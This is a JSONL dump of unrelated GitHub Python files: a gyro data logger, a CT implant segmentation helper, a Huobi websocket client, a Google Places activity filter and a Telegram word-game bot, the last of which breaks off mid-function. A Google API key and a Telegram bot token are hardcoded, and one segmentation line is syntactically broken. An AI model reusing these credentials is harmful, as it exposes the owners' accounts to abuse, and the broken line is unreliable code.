N\n self.gyroYcal /= N\n self.gyroZcal /= N\n\n # Display message and restart timer for comp filter\n print(\"Calibration complete\")\n print(\"\\tX axis offset: \" + str(round(self.gyroXcal,1)))\n print(\"\\tY axis offset: \" + str(round(self.gyroYcal,1)))\n print(\"\\tZ axis offset: \" + str(round(self.gyroZcal,1)) + \"\\n\")\n time.sleep(2)\n self.dtTimer = time.time()\n\n def processIMUvalues(self):\n # Update the raw data\n self.getRawData()\n\n # Subtract the offset calibration values\n self.gx -= self.gyroXcal\n self.gy -= self.gyroYcal\n self.gz -= self.gyroZcal\n\n # Convert to instantaneous degrees per second\n self.gx /= self.gyroScaleFactor\n self.gy /= self.gyroScaleFactor\n self.gz /= self.gyroScaleFactor\n\n # Convert to g force\n self.ax /= self.accScaleFactor\n self.ay /= self.accScaleFactor\n self.az /= self.accScaleFactor\n\n def compFilter(self):\n # Get the processed values from IMU\n self.processIMUvalues()\n\n # Get delta time and record time for next call\n dt = time.time() - self.dtTimer\n self.dtTimer = time.time()\n\n # Acceleration vector angle\n accPitch = math.degrees(math.atan2(self.ay, self.az))\n accRoll = math.degrees(math.atan2(self.ax, self.az))\n\n # Gyro integration angle\n self.gyroRoll -= self.gy * dt\n self.gyroPitch += self.gx * dt\n self.gyroYaw += self.gz * dt\n self.yaw = self.gyroYaw\n global direccion\n direccion = self.yaw #ASIGNAMOS A DIRECCION EL VALOR DEL YAW (GIRO)\n \n\n # Comp filter\n self.roll = (self.tau)*(self.roll - self.gy*dt) + (1-self.tau)*(accRoll)\n self.pitch = (self.tau)*(self.pitch + self.gx*dt) + (1-self.tau)*(accPitch)\n\n # Print data\n print(\" R: \" + str(round(self.roll,1)) \\\n + \" P: \" + str(round(self.pitch,1)) \\\n + \" Y: \" + str(round(self.yaw,1)))\n#+++++++++++++++++++++++++++++++++ FIN DEL CODIGO DEL GIROSENSOR\n\n# Set up class\ngyro = 250 # 250, 500, 1000, 2000 [deg/s]\nacc = 2 # 2, 4, 7, 16 [g]\ntau = 0.98\nmpu = MPU(gyro, acc, tau)\n\n # Set up sensor and calibrate gyro with N points\nmpu.setUp()\nmpu.calibrateGyro(500)\n \nmpu.compFilter()\nrecord = 0\ndirA = 0\nprint('Pulsar para empezar ...')\n\nwhile True: #Por siempre\n \n if GPIO.input(19) == GPIO.LOW: #Si se pulsa el boton.\n if record ==0: print('Grabacion iniciada ...')\n record +=1\n sleep(0.300)\n if record == 1:\n \n mpu.compFilter() #obtener valor del angulo del gyro\n dirB = direccion\n #global direccion\n VarDireccion = dirA-dirB\n dirA = dirB\n img = wM.getImg(True,size=[960,480])\n dcM.savedata(img,VarDireccion) #GUARDA EL NOMBRE DE LA FOTO CON EL ANGULO DE LA DIRECCION\n elif record == 2: #al pulsar el boton de nuevo, record pasa a ser 2 y se detiene la captura'''\n dcM.savelog()\n record = 0 #pasamos record a 0 para que al volver a pulsar el boton, volvamos a capturar'''\n\n cv2.waitKey(1) #small delay'''","repo_name":"eduroboticfll/PiTracker","sub_path":"Primer_Paso/DataCollectionMain.py","file_name":"DataCollectionMain.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9512414292","text":"# -*- coding: utf-8 -*-\n# @Author : runze.wang\n# @Time : 2020/8/23 6:36 PM\nimport os\nimport SimpleITK as sitk\nimport matplotlib.pyplot as plt\n\ndef seg_3D_16bit(array, threshold):\n\n array_copy = array.copy()\n array_copy[array_copy=threshold] = 1\n\n return array_copy\n\ndef implant_segmentation(img_sitk, threshold):\n\n img_array = sitk.GetArrayFromImage(img_sitk)\n implant_16 = seg_3D_16bit(img_array,threshold=threshold)\n\n return implant_16\n\nif __name__ == '__main__':\n path = '/Users/runze.wang/Desktop'\n\n img_sitk = sitk.ReadImage(os.path.join(path, '2805012.nii.gz'))\n img_array = sitk.GetArrayFromImage(img_sitk)\n implant_16 = seg_3D_16bit(img_array,threshold=2500)\n implant_16_sitk = sitk.GetImageFromArray(implant_16)\n\n #### check in 2D\n # implant_arr = sitk.GetArrayFromImage(implant_16_sitk)\n # implant_arr[implant_arr==1] = 255\n # plt.imshow(implant_arr[57, :, :], cmap='gray')\n # plt.show()\n\n sitk.WriteImage(implant_16_sitk, os.path.join(path, 'implant.nii.gz'))\n\n\n print('Done')\n\n","repo_name":"runze-wang-sjtu/tools","sub_path":"implant_segmentation.py","file_name":"implant_segmentation.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"33774350078","text":"import time\nfrom huobi.impl.websocketrequest import WebsocketRequest\nfrom huobi.impl.utils.channels import *\nfrom huobi.impl.utils.channelparser import ChannelParser\nfrom huobi.impl.accountinfomap import account_info_map\nfrom huobi.impl.utils.timeservice import *\nfrom huobi.impl.utils.inputchecker import *\nfrom huobi.model import *\n\n\nclass WebsocketRequestImpl(object):\n\n def __init__(self, api_key):\n self.__api_key = api_key\n\n def subscribe_candlestick_event(self, symbols, interval, callback, error_handler=None):\n check_symbol_list(symbols)\n check_should_not_none(interval, \"interval\")\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n for val in symbols:\n connection.send(kline_channel(val, interval))\n time.sleep(0.01)\n\n def json_parse(json_wrapper):\n ch = json_wrapper.get_string(\"ch\")\n parse = ChannelParser(ch)\n candlestick_event = CandlestickEvent()\n candlestick_event.symbol = parse.symbol\n candlestick_event.interval = interval\n candlestick_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n tick = json_wrapper.get_object(\"tick\")\n data = Candlestick()\n data.timestamp = convert_cst_in_second_to_utc(tick.get_int(\"id\"))\n data.open = tick.get_float(\"open\")\n data.close = tick.get_float(\"close\")\n data.low = tick.get_float(\"low\")\n data.high = tick.get_float(\"high\")\n data.amount = tick.get_float(\"amount\")\n data.count = tick.get_int(\"count\")\n data.volume = tick.get_float(\"vol\")\n candlestick_event.data = data\n return candlestick_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = False\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n\n def subscribe_24h_trade_statistics_event(self, symbols, callback, error_handler=None):\n check_symbol_list(symbols)\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n for val in symbols:\n connection.send(trade_statistics_channel(val))\n time.sleep(0.01)\n\n def json_parse(json_wrapper):\n ch = json_wrapper.get_string(\"ch\")\n parse = ChannelParser(ch)\n trade_statistics_event = TradeStatisticsEvent()\n trade_statistics_event.symbol = parse.symbol\n ts = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n trade_statistics_event.timestamp = ts\n tick = json_wrapper.get_object(\"tick\")\n statistics = TradeStatistics()\n statistics.amount = tick.get_float(\"amount\")\n statistics.open = tick.get_float(\"open\")\n statistics.close = tick.get_float(\"close\")\n statistics.high = tick.get_float(\"high\")\n statistics.timestamp = ts\n statistics.count = tick.get_int(\"count\")\n statistics.low = tick.get_float(\"low\")\n statistics.volume = tick.get_float(\"vol\")\n trade_statistics_event.trade_statistics = statistics\n return trade_statistics_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = False\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n\n def subscribe_trade_event(self, symbols, callback, error_handler=None):\n check_symbol_list(symbols)\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n for val in symbols:\n connection.send(trade_channel(val))\n time.sleep(0.01)\n\n def json_parse(json_wrapper):\n ch = json_wrapper.get_string(\"ch\")\n parse = ChannelParser(ch)\n trade_event = TradeEvent()\n trade_event.symbol = parse.symbol\n trade_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n tick = json_wrapper.get_object(\"tick\")\n data_array = tick.get_array(\"data\")\n trade_list = list()\n for item in data_array.get_items():\n trade = Trade()\n trade.amount = item.get_float(\"amount\")\n trade.price = item.get_float(\"price\")\n trade.trade_id = item.get_string(\"id\")\n trade.direction = item.get_string(\"direction\")\n trade.timestamp = convert_cst_in_millisecond_to_utc(item.get_int(\"ts\"))\n trade_list.append(trade)\n trade_event.trade_list = trade_list\n return trade_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = False\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n\n def subscribe_price_depth_event(self, symbols, callback, error_handler=None):\n check_symbol_list(symbols)\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n for val in symbols:\n connection.send(price_depth_channel(val))\n time.sleep(0.01)\n\n def json_parse(json_wrapper):\n ch = json_wrapper.get_string(\"ch\")\n parse = ChannelParser(ch)\n price_depth_event = PriceDepthEvent()\n price_depth_event.symbol = parse.symbol\n price_depth_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n price_depth = PriceDepth()\n tick = json_wrapper.get_object(\"tick\")\n bid_list = list()\n bids_array = tick.get_array(\"bids\")\n for item in bids_array.get_items_as_array():\n depth_entry = DepthEntry()\n depth_entry.price = item.get_float_at(0)\n depth_entry.amount = item.get_float_at(1)\n bid_list.append(depth_entry)\n ask_list = list()\n asks_array = tick.get_array(\"asks\")\n for item in asks_array.get_items_as_array():\n depth_entry = DepthEntry()\n depth_entry.price = item.get_float_at(0)\n depth_entry.amount = item.get_float_at(1)\n ask_list.append(depth_entry)\n price_depth.bids = bid_list\n price_depth.asks = ask_list\n price_depth_event.data = price_depth\n return price_depth_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = False\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n\n def subscribe_order_update(self, symbols, callback, error_handler=None):\n check_symbol_list(symbols)\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n for val in symbols:\n connection.send(orders_channel(val))\n time.sleep(0.01)\n\n def json_parse(json_wrapper):\n ch = json_wrapper.get_string(\"topic\")\n parse = ChannelParser(ch)\n order_update_event = OrderUpdateEvent()\n order_update_event.symbol = parse.symbol\n order_update_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n data = json_wrapper.get_object(\"data\")\n order = Order()\n order.order_id = data.get_int(\"order-id\")\n order.symbol = parse.symbol\n order.account_type = account_info_map.get_account_by_id(self.__api_key,\n data.get_int(\"account-id\")).account_type\n order.amount = data.get_float(\"order-amount\")\n order.price = data.get_float(\"order-price\")\n order.created_timestamp = convert_cst_in_millisecond_to_utc(data.get_int(\"created-at\"))\n order.order_type = data.get_string(\"order-type\")\n order.filled_amount = data.get_float(\"filled-amount\")\n order.filled_cash_amount = data.get_float(\"filled-cash-amount\")\n order.filled_fees = data.get_float(\"filled-fees\")\n order.state = data.get_string(\"order-state\")\n order.source = data.get_string(\"order-source\")\n order_update_event.data = order\n return order_update_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = True\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n\n def subscribe_account_event(self, mode, callback, error_handler=None):\n check_should_not_none(mode, \"mode\")\n check_should_not_none(callback, \"callback\")\n\n def subscription_handler(connection):\n connection.send(account_channel(mode))\n\n def json_parse(json_wrapper):\n account_event = AccountEvent()\n account_event.timestamp = convert_cst_in_millisecond_to_utc(json_wrapper.get_int(\"ts\"))\n data = json_wrapper.get_object(\"data\")\n account_event.change_type = data.get_string(\"event\")\n list_array = data.get_array(\"list\")\n account_change_list = list()\n for item in list_array.get_items():\n account_change = AccountChange()\n account_change.account_type = account_info_map.get_account_by_id(self.__api_key, item.get_int(\n \"account-id\")).account_type\n account_change.currency = item.get_string(\"currency\")\n account_change.balance = item.get_float(\"balance\")\n account_change.balance_type = item.get_string(\"type\")\n account_change_list.append(account_change)\n account_event.account_change_list = account_change_list\n return account_event\n\n request = WebsocketRequest()\n request.subscription_handler = subscription_handler\n request.is_trading = True\n request.json_parser = json_parse\n request.update_callback = callback\n request.error_handler = error_handler\n return request\n","repo_name":"jxu86/huobi_future","sub_path":"huobi_future/impl/websocketrequestimpl.py","file_name":"websocketrequestimpl.py","file_ext":"py","file_size_in_byte":10728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9053174797","text":"from difflib import SequenceMatcher as sm\nfrom functools import reduce\nimport os, requests, json, multiprocessing as mp\n\n############ this is based on string comparisons\ndef sort_by_similarity(similarities):\n\treturn sorted(similarities, key = lambda t: t[1])[::-1]\n\ndef match_locations_by_name(user_idea):\n\twith open(\"types.txt\", \"r\") as types:\n\t\tsimilarities = [[t, sm(None, t, user_idea).ratio()] for t in types.read().split()]\n\t\treturn sort_by_similarity(similarities)\n\ndef union_of_params(*user_activities):\n\tmatched_activities = reduce(lambda i1, i2: i1 + i2,\n\t\t[match_locations_by_name(i) for i in user_activities])\n\tidea_set = []\n\tfor idea in matched_activities:\n\t\tif idea[0] not in [i[0] for i in idea_set]:\n\t\t\tidea_set.append(idea)\n\treturn [i for i in sort_by_similarity(idea_set) if i[1] != 0]\n\n\"\"\"\nif __name__ == \"__main__\":\n\ta = union_of_params(\"rental\", \"travel\", \"flight\")\n\tprint(a)\n\"\"\"\n\n##############\n\nclass Activity:\n\tdef __init__(self, name: str, type_: str, location: list, inside: bool, cost: int):\n\t\tself.name = name\n\t\tself.type = type_\n\t\tself.location = location\n\t\tself.inside = inside\n\t\tself.cost = cost\n\n\tdef matches_criteria(self, *criteria):\n\t\tfor [crit_type, crit_val] in criteria:\n\t\t\tif crit_type == \"type\":\n\t\t\t\treturn self.type == crit_val\n\t\t\telif crit_type == \"inside\":\n\t\t\t\treturn self.inside == crit_val\n\t\t\telif crit_type == \"closeness\":\n\t\t\t\t# crit val is a pair of lat and long\n\t\t\t\tdlat, dlong = abs(loc[0] - self.location[0]), abs(loc[1] - self.location[1])\n\t\t\t\treturn ((dlat + dlong) / 2) < 50\n\t\t\telif crit_type == \"cheap_cost\": # hardcoded at the moment\n\t\t\t\treturn self.cost <= 50\n\t\t\telif crit_type == \"medium_cost\":\n\t\t\t\treturn 75 > self.cost > 50\n\t\t\telif crit_type == \"expensive_cost\":\n\t\t\t\treturn self.cost >= 75\n\ndef filter_by_criteria(activities, criteria):\n\tif not activities:\n\t\treturn activities\n\tfor criterion in criteria:\n\t\tactivity = activities[0]\n\t\tif not activity.matches_criteria(criterion):\n\t\t\treturn filter_by_criteria(activities[1:], criteria)\n\treturn [activity] + filter_by_criteria(activities[1:], criteria)\n\n\"\"\"\nif __name__ == \"__main__\":\n\tactivities = [Activity(\"jogging\", \"recreation\", [125.6, 350.0], False, 3),\n\t\tActivity(\"hula hoop\", \"recreation\", [345.2, 90.3], True, 10),\n\t\tActivity(\"library\", \"academic\", [200, 200], True, 60),\n\t\tActivity(\"outdoor studying\", \"academic\", [300, 300], False, 5)]\n\tr = filter_by_criteria(activities, [[\"inside\", True], [\"medium_cost\", None]])\n\tprint(r[0].name)\n\"\"\"\n\ndef single_type_google_api(payload):\n\tbase = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json?\"\n\tparam_list = [f\"type={payload['type']}\", 'fields=photos,name,rating,business_status,price_level']\n\tfor key in payload.keys():\n\t\tif key != 'type':\n\t\t\tparam_list.append(f\"{key}={payload[key]}\")\n\tparams = '&'.join(param_list)\n\tg = json.loads(requests.get(base + params).text)\n\tif g['status'] == 'OK':\n\t\treturn g['results']\n\treturn []\n\ndef nearby_locs_from_type(d):\n\t\n\tbase = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json?\"\n\tresults = []\n\tif 'type' in d.keys():\n\t\tplacetype = d['type']\n\t\tdel d['type']\n\t\tall_data = []\n\t\tfor place in placetype:\n\t\t\tnew_d = d.copy()\n\t\t\tnew_d['type'] = place\n\t\t\tall_data.append(new_d)\n\t\t\n\t\twith mp.Pool(5) as p:\n\t\t\traw_results = p.map(single_type_google_api, all_data)\n\t\tfor r in raw_results:\n\t\t\tresults.extend(r)\n\t\t# for place_type in d['type']:\n\t\t# \tparam_list = [f\"location={os.popen('curl ipinfo.io/loc').read()}\", f\"type={place_type}\", 'fields=photos,name,rating,business_status,price_level']\n\t\t# \tfor key in d.keys():\n\t\t# \t\tif key != 'type':\n\t\t# \t\t\tparam_list.append(f\"{key}={d[key]}\")\n\t\t# \tparams = '&'.join(param_list)\n\t\t# \tg = json.loads(requests.get(base + params).text)\n\t\t# \tif g['status'] == 'OK':\n\t\t# \t\tresults.extend(g['results'])\n\t\treturn sorted(results, key=lambda x:x['rating'] if 'rating' in x.keys() else 3, reverse=True)\n\telse:\n\t\tparam_list = ['fields=photos,name,rating,business_status,price_level']\n\t\tfor key in d.keys():\n\t\t\tif key != 'type':\n\t\t\t\tparam_list.append(f\"{key}={d[key]}\")\n\t\tparams = '&'.join(param_list)\n\n\t\treturn sorted(json.loads(requests.get(base + params).text)['results'], key=lambda x:x['rating'], reverse=True)\n\n\timport requests, json\n\ndef lat_long_from_address(key, address):\n\tbase = \"https://maps.googleapis.com/maps/api/geocode/json?\"\n\tparams = f\"address={address.replace(' ', '+')}&key={key}\"\n\tresponse = requests.get(base + params).text\n\treturn json.loads(response)[\"results\"][0][\"geometry\"][\"bounds\"][\"northeast\"]\n\nif __name__ == \"__main__\":\n\tgeocode_key = \"AIzaSyC6J9AVhQ6oJ7wL9khOUZMSQUgDptc_vGY\"\n\tresponse = lat_long_from_address(geocode_key, \"23 Columbia Street, Watertown MA\")\n\tprint(response)","repo_name":"CaspianA1/BBN-Hackathon","sub_path":"activity_filter.py","file_name":"activity_filter.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6827829258","text":"import telebot\nfrom session_key_generator import gen_session_key\nimport new_db as db\n\nbot = telebot.TeleBot(\"5036774816:AAHchvlUTJaraZVF0YjQU45x0PviPkweH8I\", parse_mode=\"MarkdownV2\")\n\nsessions = {}\n\n@bot.message_handler(commands=['start', 'help'])\ndef send_welcome(message):\n \"\"\"\n Отправляет приветственное сообщение с единственной кнопкой, которая запускает игру.\n\n В функции генерируется ключ сессии.\n\n :param message: отвечает за восприятие сообщения, которое присылает пользователь - /start или /help\n \n Функция ничего не возвращает \n \"\"\"\n \n new_key=gen_session_key()\n new_session = db.Session(new_key)\n sessions[new_key] = new_session\n\n \n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Поехали\", callback_data='Create_Game'+'$'+new_key)]\n ]\n\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n pic = 'https://play-lh.googleusercontent.com/z51QcdFNaomOeMaJy8X0Fy5rusgnvpmoB4UevtRLR-M4_9NzUQji7YVU08J3vUL10w'\n bot.send_photo(message.chat.id, pic)\n bot.send_message(message.chat.id, 'Суть игры заключается в объяснении слов с помощью синонимов, '\n 'антонимов или подсказок. Игрокам необходимо обьяснить как можно '\n 'больше слов за отведенный период времени. За каждое отгаданное слово '\n 'игроки получают 1 очко и продвигаются на 1 шаг вперед. Для победы нужно '\n 'набрать больше 24 очков', reply_markup=reply_markup, parse_mode=\"HTML\")\n\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_query(call):\n \"\"\"\n Данная функция отвечает за кнопки, появляющиеся на различных этапах игры\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n \n if \"Create_Game\" in call.data:\n create_game(call)\n elif \"Round_Length\" in call.data:\n round_length(call)\n elif \"Game_Length\" in call.data:\n game_length(call)\n elif \"Start_Game\" in call.data:\n cur_session = sessions[call.data[-4:]]\n if len(cur_session.teams) >= 1:\n game(call)\n else:\n error_teams(call)\n ##############################################\n elif \"YES\" in call.data:\n cur_session = sessions[call.data[-4:]]\n if 'guessed' in call.data:\n resp = cur_session.next_team(1)\n if resp == 1:\n game(call)\n elif resp == 3:\n game_end(call)\n else:\n round(call)\n elif 'passed' in call.data:\n resp = cur_session.next_team(0)\n if resp == 1:\n game(call)\n elif resp == 3:\n game_end(call)\n else:\n round(call)\n else:\n round(call)\n ###############################################\n elif \"Time_For_Round_3\" in call.data:\n sessions[call.data[-4:]].change_time(3)\n print(sessions)\n elif \"Time_For_Round_5\" in call.data:\n sessions[call.data[-4:]].change_time(5)\n print(sessions)\n elif \"Time_For_Round_10\" in call.data:\n sessions[call.data[-4:]].change_time(10)\n print(sessions)\n elif \"Time_For_Round_15\" in call.data:\n sessions[call.data[-4:]].change_time(15)\n print(sessions)\n elif \"Time_For_Round_50\" in call.data:\n sessions[call.data[-4:]].change_time(50)\n print(sessions)\n ###############################################\n elif \"Time_For_Game_10\" in call.data:\n sessions[call.data[-4:]].change_max_score(10)\n print(sessions)\n elif \"Time_For_Game_20\" in call.data:\n sessions[call.data[-4:]].change_max_score(20)\n print(sessions)\n elif \"Time_For_Game_30\" in call.data:\n sessions[call.data[-4:]].change_max_score(30)\n print(sessions)\n elif \"Time_For_Game_50\" in call.data:\n sessions[call.data[-4:]].change_max_score(50)\n print(sessions)\n elif \"Time_For_Game_100\" in call.data:\n sessions[call.data[-4:]].change_max_score(100)\n print(sessions)\n ################################################\n elif \"Teams\" in call.data :\n change_teams(call)\n elif 'Супер Коровы' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(sessions)\n elif 'Псы Волколаки' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(sessions)\n elif 'Ночные Бабушки' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(call.data)\n print(sessions)\n elif 'Биполярные Медведи' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(sessions)\n elif 'Лягушки в обмороке' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(sessions)\n ###########################################################\n elif 'End_Game' in call.data:\n thanks(call)\n elif 'Next_Game' in call.data:\n cur_session = sessions[call.data[-4:]]\n cur_session.clear()\n create_game(call)\n elif 'Authors' in call.data:\n authors(call)\n elif 'after_authors' in call.data:\n game_end(call)\n\n\ndef create_game(call):\n \"\"\"\n Функция отвечает за этап игры, на котором человек вводит длительность игры, длительность раунда, добавляет команды, а также начинает игру\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n new_key = call.data[-4:]\n cur_session = sessions[new_key]\n cur_teams = cur_session.teams\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Начать игру\", callback_data='Start_Game'+'$'+new_key)],\n [telebot.types.InlineKeyboardButton(\"Длительность раунда\", callback_data='Round_Length'+'$'+new_key)],\n [telebot.types.InlineKeyboardButton(\"Длительность игры\", callback_data='Game_Length'+'$'+new_key)],\n [telebot.types.InlineKeyboardButton(\"Добавить команды\", callback_data='Teams'+'$'+new_key)]\n ]\n\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n\n createGameMessage = 'Выберите подходящие параметры для своей игры, затем нажмите \"Начать игру\", чтобы к ней присоединиться'\n createGameMessage += cur_session.get_info()\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=createGameMessage,\n reply_markup=reply_markup)\n\ndef game(call):\n \"\"\"\n Функция изменяет сообщение на 'Вы готовы?', показывает отвечающую команду и и её очки\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n cur_team = cur_session.cur_team()\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Да!\", callback_data='YES' + '$' + call.data[-4:])]\n ]\n \n ready = f'Команда {str(cur_team)}, вы готовы?\\nОчки команд:\\n'\n for i in cur_session.teams:\n ready += (' ' + str(i.name) + ' ' + str(i.points) + '\\n')\n \n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=ready,\n reply_markup=reply_markup)\n\n\ndef round(call):\n \"\"\"\n Функция отвечает за раунд в игре, изменяет сообщение, показывая новое слово, под которым имеются кнопки \"Отгадано\" и \"Пропущено\"\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n word = cur_session.give_word()\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Отгадано\", callback_data='YES_guessed' + '$' + call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Пропущено\", callback_data='YES_passed' + '$' + call.data[-4:])]\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text= \"ваше слово: \"+word,\n reply_markup=reply_markup)\n\n\ndef round_length(call):\n \"\"\"\n Функция изменяет сообщение, показывая кнопки, через которые можно изменить количество слов, которое будет объяснять команда в раунде\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"3\", callback_data='Time_For_Round_3'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"5\", callback_data='Time_For_Round_5'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"10\", callback_data='Time_For_Round_10'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"15\", callback_data='Time_For_Round_15'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"ОК\", callback_data='Create_Game'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"50\", callback_data='Time_For_Round_50'+'$'+call.data[-4:])]\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n round_length_text = 'Выберите длительность раунда (количество слов, объясняемое за раунд)'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=round_length_text, parse_mode=\"HTML\", reply_markup=reply_markup)\n\ndef game_length(call):\n \"\"\"\n Функция изменяет сообщение, показывая кнопки, через которые можно изменить количество слов, требуемое для победы в игре\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"10\", callback_data='Time_For_Game_10'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"20\", callback_data='Time_For_Game_20'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"30\", callback_data='Time_For_Game_30'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"50\", callback_data='Time_For_Game_50'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"ОК\", callback_data='Create_Game'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"100\", callback_data='Time_For_Game_100'+'$'+call.data[-4:])]\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n round_length_text = 'Выберите длительность игры (в количестве слов)'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=round_length_text, parse_mode=\"HTML\", reply_markup=reply_markup)\n\ndef change_teams(call):\n \"\"\"\n Функция изменяет сообщение, показывая кнопки, через которые можно изменить команды, участвующие в игре\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"ОК\", callback_data='Create_Game'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Супер Коровы 🐮\" + '✅' if \"🐮\" in cur_session.get_info() else \"Супер Коровы 🐮\" + '', callback_data='Супер Коровы'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Псы Волколаки 🐺\" + '✅' if \"🐺\" in cur_session.get_info() else \"Псы Волколаки 🐺\" + '', callback_data='Псы Волколаки'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Ночные Бабушки 👵\" + '✅' if \"👵\" in cur_session.get_info() else \"Ночные Бабушки 👵\" + '', callback_data='Ночные Бабушки'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Биполярные Медведи 🐼\" + '✅' if \"🐼\" in cur_session.get_info() else \"Биполярные медведи 🐼\" + '', callback_data='Биполярные Медведи' + '$' + call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Лягушки в обмороке 🐸\" + '✅' if \"🐸\" in cur_session.get_info() else \"Лягушки в обмороке 🐸\" + '', callback_data='Лягушки в обмороке' + '$' + call.data[-4:])],\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n teams_text = 'нажмите на названия команд, которые хотите добавить'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=teams_text, parse_mode=\"HTML\", reply_markup=reply_markup)\n\n\ndef game_end(call):\n \"\"\"\n Функция изменяет сообщение в конце игры, показывая кнопки, с помощью которых можно начать новую игру, завершить игру и посмотреть на авторов\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Новая игра\", callback_data='Next_Game'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Завершить игру\", callback_data='End_Game'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Авторы\", callback_data='Authors'+'$'+call.data[-4:])]\n ]\n text_endgame = 'Игра завершена, победила команда '+ cur_session.cur_team() + '\\n'\n text_endgame += 'Очки 